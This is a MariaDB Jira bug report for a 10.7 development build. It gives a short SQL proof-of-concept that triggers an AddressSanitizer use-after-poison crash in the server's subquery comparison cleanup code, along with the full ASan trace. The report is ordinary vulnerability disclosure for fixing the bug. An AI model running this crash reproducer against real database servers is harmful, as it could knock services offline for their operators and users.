[MDEV-26408] use-after-poison security in sql/item_cmpfunc.h Created: 2021-08-19  Updated: 2021-08-27  Resolved: 2021-08-27

Status: Closed
Project: MariaDB Server
Component/s: Data Manipulation - Subquery
Affects Version/s: 10.7
Fix Version/s: N/A

Type: Bug Priority: Major
Reporter: Zhiyong Wu Assignee: Unassigned
Resolution: Duplicate Votes: 0
Labels: None
Environment:

Linux version 5.13.0-1-MANJARO (builduser@LEGION) (gcc (GCC) 11.1.0, GNU ld (GNU Binutils) 2.36.1) #1 SMP PREEMPT Mon Jun 7 06:16:10 UTC 2021 x86_64

Issue Links:
Duplicate
duplicates MDEV-26407 Server crashes in Item_func_in::clean... Closed

 Description   

PoC:

CREATE TEMPORARY TABLE v0 ( v1 CHAR , NEW INT AS ( CASE 'x' WHEN v1 = 'x' THEN v1 ELSE 'x' = FROM_UNIXTIME ( 2147483647 ) END ) ) ;
 
 UPDATE v0 SET v1 = 0 , v1 = 95 WHERE v1 = 5 AND v1 = -1 ;
 
 SELECT length ( least ( 'x' 'x' 'x' 'x' ^ 0 + 'x' ^ 79070223.000000 + 93 ^ 25145487.000000 + -128 ^ 72176287.000000 , 'x' ) ) FROM DUAL ;
 
 DELETE FROM v0 WHERE ( v1 , v1 ) IN ( ( 8 , 'x' ) , ( 45 , 'x' ) ) ORDER BY v1 , v1 LIMIT 15 ;
 
 SET GLOBAL READ_ONLY = YEAR ( str_to_date ( 'x' , NULL ) ) ;
 
 USE WARNINGS ;

Asan report:

2021-08-16 14:41:38 0 [Note] InnoDB: Compressed tables use zlib 1.2.11
 
2021-08-16 14:41:38 0 [Note] InnoDB: Number of pools: 1
 
2021-08-16 14:41:38 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions
 
2021-08-16 14:41:38 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)
 
2021-08-16 14:41:38 0 [Note] InnoDB: Using liburing
 
2021-08-16 14:41:38 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728
 
2021-08-16 14:41:38 0 [Note] InnoDB: Completed initialization of buffer pool
 
2021-08-16 14:41:38 0 [Note] InnoDB: 128 rollback segments are active.
 
2021-08-16 14:41:38 0 [Note] InnoDB: Creating shared tablespace for temporary tables
 
2021-08-16 14:41:38 0 [Note] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...
 
2021-08-16 14:41:38 0 [Note] InnoDB: File './ibtmp1' size is now 12 MB.
 
2021-08-16 14:41:38 0 [Note] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14
 
2021-08-16 14:41:38 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib_buffer_pool
 
2021-08-16 14:41:38 0 [Note] Plugin 'FEEDBACK' is disabled.
 
2021-08-16 14:41:38 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 14:41:38
 
2021-08-16 14:41:38 0 [Note] Server socket created on IP: '0.0.0.0'.
 
2021-08-16 14:41:38 0 [Note] Server socket created on IP: '::'.
 
2021-08-16 14:41:38 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.
 
Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution
 
2021-08-16 14:41:39 0 [Note] /usr/local/mysql/bin//mysqld (initiated by: root[root] @ localhost []): Normal shutdown
 
2021-08-16 14:41:39 0 [Note] InnoDB: FTS optimize thread exiting.
 
2021-08-16 14:41:39 0 [Note] InnoDB: Starting shutdown...
 
2021-08-16 14:41:39 0 [Note] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib_buffer_pool
 
2021-08-16 14:41:39 0 [Note] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39
 
2021-08-16 14:41:39 0 [Note] InnoDB: Removed temporary tablespace data file: "./ibtmp1"
 
2021-08-16 14:41:39 0 [Note] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15
 
2021-08-16 14:41:39 0 [Note] /usr/local/mysql/bin//mysqld: Shutdown complete
 
 
 
2021-08-16 14:55:18 0 [Note] InnoDB: Compressed tables use zlib 1.2.11
 
2021-08-16 14:55:18 0 [Note] InnoDB: Number of pools: 1
 
2021-08-16 14:55:18 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions
 
2021-08-16 14:55:18 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)
 
2021-08-16 14:55:18 0 [Note] InnoDB: Using liburing
 
2021-08-16 14:55:18 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728
 
2021-08-16 14:55:18 0 [Note] InnoDB: Completed initialization of buffer pool
 
2021-08-16 14:55:28 0 [Note] InnoDB: 128 rollback segments are active.
 
2021-08-16 14:55:28 0 [Note] InnoDB: Creating shared tablespace for temporary tables
 
2021-08-16 14:55:28 0 [Note] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...
 
2021-08-16 14:55:28 0 [Note] InnoDB: File './ibtmp1' size is now 12 MB.
 
2021-08-16 14:55:29 0 [Note] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14
 
2021-08-16 14:55:29 0 [Note] Plugin 'FEEDBACK' is disabled.
 
2021-08-16 14:55:29 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/17/ib_buffer_pool
 
2021-08-16 14:55:29 0 [Note] Server socket created on IP: '0.0.0.0'.
 
2021-08-16 14:55:29 0 [Note] Server socket created on IP: '::'.
 
2021-08-16 14:55:29 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 14:55:29
 
2021-08-16 14:55:29 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.
 
Version: '10.7.0-MariaDB'  socket: '/tmp/17.socket'  port: 10017  Source distribution
 
=================================================================
 
==3376229==ERROR: AddressSanitizer: use-after-poison on address 0x6290000889f8 at pc 0x560b3515065f bp 0x7f31f2db85d0 sp 0x7f31f2db85c0
 
READ of size 8 at 0x6290000889f8 thread T13
 
    #0 0x560b3515065e in Predicant_to_list_comparator::Predicant_to_value_comparator::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2105
 
    #1 0x560b3515065e in Predicant_to_list_comparator::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2214
 
    #2 0x560b3515065e in Item_func_case_simple::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2397
 
    #3 0x560b347a08c3 in Item::delete_self() /experiment/mariadb-server/sql/item.h:2522
 
    #4 0x560b347a08c3 in Query_arena::free_items() /experiment/mariadb-server/sql/sql_class.cc:3823
 
    #5 0x560b34bec7d8 in closefrm(TABLE*) /experiment/mariadb-server/sql/table.cc:4434
 
    #6 0x560b34ec50f4 in THD::close_temporary_table(TABLE*) /experiment/mariadb-server/sql/temporary_tables.cc:1238
 
    #7 0x560b34ec7464 in THD::close_temporary_tables() /experiment/mariadb-server/sql/temporary_tables.cc:531
 
    #8 0x560b347a19ef in THD::cleanup() /experiment/mariadb-server/sql/sql_class.cc:1549
 
    #9 0x560b345a51c4 in unlink_thd(THD*) /experiment/mariadb-server/sql/mysqld.cc:2686
 
    #10 0x560b34ca494b in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1429
 
    #11 0x560b34ca533c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
 
    #12 0x560b35735c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
 
    #13 0x7f3212044258 in start_thread (/usr/lib/libpthread.so.0+0x9258)
 
    #14 0x7f3211bef5e2 in __GI___clone (/usr/lib/libc.so.6+0xfe5e2)
 
 
 
0x6290000889f8 is located 6136 bytes inside of 16400-byte region [0x629000087200,0x62900008b210)
 
allocated by thread T13 here:
 
    #0 0x7f32126d6279 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145
 
    #1 0x560b360689a8 in my_malloc /experiment/mariadb-server/mysys/my_malloc.c:90
 
    #2 0x560b36054e40 in reset_root_defaults /experiment/mariadb-server/mysys/my_alloc.c:243
 
    #3 0x560b347961b8 in THD::init_for_queries() /experiment/mariadb-server/sql/sql_class.cc:1405
 
    #4 0x560b34ca2d51 in prepare_new_connection_state(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1240
 
    #5 0x560b34ca365f in thd_prepare_connection(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1333
 
    #6 0x560b34ca365f in thd_prepare_connection(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1322
 
    #7 0x560b34ca4e0a in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1408
 
    #8 0x560b34ca533c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
 
    #9 0x560b35735c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
 
    #10 0x7f3212044258 in start_thread (/usr/lib/libpthread.so.0+0x9258)
 
 
 
Thread T13 created by T0 here:
 
    #0 0x7f3212677fa7 in __interceptor_pthread_create /build/gcc/src/gcc/libsanitizer/asan/asan_interceptors.cpp:216
 
    #1 0x560b35735ea9 in my_thread_create /experiment/mariadb-server/storage/perfschema/my_thread.h:48
 
    #2 0x560b35735ea9 in pfs_spawn_thread_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252
 
    #3 0x560b345a6b3c in inline_mysql_thread_create /experiment/mariadb-server/include/mysql/psi/mysql_thread.h:1139
 
    #4 0x560b345a6b3c in create_thread_to_handle_connection(CONNECT*) /experiment/mariadb-server/sql/mysqld.cc:5934
 
    #5 0x560b345b27b6 in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /experiment/mariadb-server/sql/mysqld.cc:6055
 
    #6 0x560b345b336f in handle_connections_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179
 
    #7 0x560b345b6a52 in mysqld_main(int, char**) /experiment/mariadb-server/sql/mysqld.cc:5829
 
    #8 0x7f3211b18b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
 
 
 
SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/item_cmpfunc.h:2105 in Predicant_to_list_comparator::Predicant_to_value_comparator::cleanup()
 
Shadow bytes around the buggy address:
 
  0x0c52800090e0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
  0x0c52800090f0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
  0x0c5280009100: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
  0x0c5280009110: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
  0x0c5280009120: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
=>0x0c5280009130: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7[f7]
 
  0x0c5280009140: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
  0x0c5280009150: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
  0x0c5280009160: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
  0x0c5280009170: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
  0x0c5280009180: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
 
Shadow byte legend (one shadow byte represents 8 application bytes):
 
  Addressable:           00
 
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
 
  Freed heap region:       fd
 
  Stack left redzone:      f1
 
  Stack mid redzone:       f2
 
  Stack right redzone:     f3
 
  Stack after return:      f5
 
  Stack use after scope:   f8
 
  Global redzone:          f9
 
  Global init order:       f6
 
  Poisoned by user:        f7
 
  Container overflow:      fc
 
  Array cookie:            ac
 
  Intra object redzone:    bb
 
  ASan internal:           fe
 
  Left alloca redzone:     ca
 
  Right alloca redzone:    cb
 
  Shadow gap:              cc
 
==3376229==ABORTING
 
GNU gdb (GDB) 10.2
 
Copyright (C) 2021 Free Software Foundation, Inc.
 
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
 
This is free software: you are free to change and redistribute it.
 
There is NO WARRANTY, to the extent permitted by law.
 
Type "show copying" and "show warranty" for details.
 
This GDB was configured as "x86_64-pc-linux-gnu".
 
Type "show configuration" for configuration details.
 
For bug reporting instructions, please see:
 
<https://www.gnu.org/software/gdb/bugs/>.
 
Find the GDB manual and other documentation resources online at:
 
    <http://www.gnu.org/software/gdb/documentation/>.
 
 
 
For help, type "help".
 
Type "apropos word" to search for commands related to "word"...
 
Reading symbols from /usr/local/mysql/bin//mysqld...
 
(gdb) (gdb) (gdb) quit


Generated at Thu Feb 08 09:45:05 UTC 2024 using Jira 8.20.16#820016-sha1:9d11dbea5f4be3d4cc21f03a88dd11d8c8687422.